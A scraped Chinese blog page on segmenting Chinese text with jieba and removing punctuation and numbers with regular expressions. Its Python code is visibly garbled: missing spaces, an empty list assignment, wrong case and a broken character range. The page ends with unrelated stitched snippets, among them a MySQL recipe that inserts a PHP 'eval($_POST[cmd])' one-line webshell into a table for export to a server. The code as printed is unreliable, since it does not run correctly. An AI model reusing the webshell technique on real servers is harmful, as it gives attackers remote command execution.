簡單利用了正規表示式以及python函式,去掉自己需要測試文字中的數字,文字以及標點符號。這個功能是用在一句中文文字分詞處理的基礎上,所以直接上乙個分詞函式,包含了標點等處理的**:
from string import punctuation
import re
import jieba
add_punc=',。、【】「」:;()《》『』{}?!⑦()、%^>℃:.」「^-——=擅長於的@¥'
all_punc=punctuation+add_punc
defsentence_cut
(x):
#cut words and delete punctuation
x=re.sub(r'[a-za-z0-9]|/d+','',x)#delet numbers and letters
testline = jieba.cut(x,cut_all=false)
testline=' '.join(testline)
testline=testline.split(' ')
te2=
for i in testline:
if i in all_punc:
te2.remove(i)
return te2
所以測試一下,效果還是不錯滴。注意,在python中re模組裡的punctuation只是包含了英文的特殊標點符號,所以如果要translate.punctuation是需要把這個punctuation·字串再加上一些你需要的特殊字元等替換一下的。
x='python和它你選哪1個,你不要%任性地*操作'
sentence_cut(x)
out[99]: ['和', '它', '你', '選', '哪個', '你', '不要', '任性', '地', '操作']
在網上看到其他大神的寫法,就是如果涉及的文字的處理中,只需要中文,那麼就只提取中文這樣簡單粗暴就好:
text=''.join(re.findall(u'[\u4e00-\u9fff]+', text))
mysql 匯出一句話 MySQL 匯出一句話
drop table if exists temp 如果存在temp就刪掉 create table temp cmd text not null 建立temp表,裡面就乙個cmd欄位 insert into temp cmd values php eval post cmd 把一句話木馬插入到te...
一句話提醒
1 在c 中,父窗體要訪問子窗體變數,需將子窗體變數設為public才能訪問。2 每 5 秒重新整理頁面 5 秒後重定向頁面 3 block 此元素將顯示為塊級元素,此元素前後會帶有換行符。inline 預設。此元素會被顯示為內聯元素,元素前後沒有換行符。4 document.getelementb...
一句話命令
bash 型別 wget r nc np 分片20m 上傳 bypy vvv s 20m upload mac下檢視埠占用 nettop nm tcp brew brew uninstall zsh brew services list brew services start brew servic...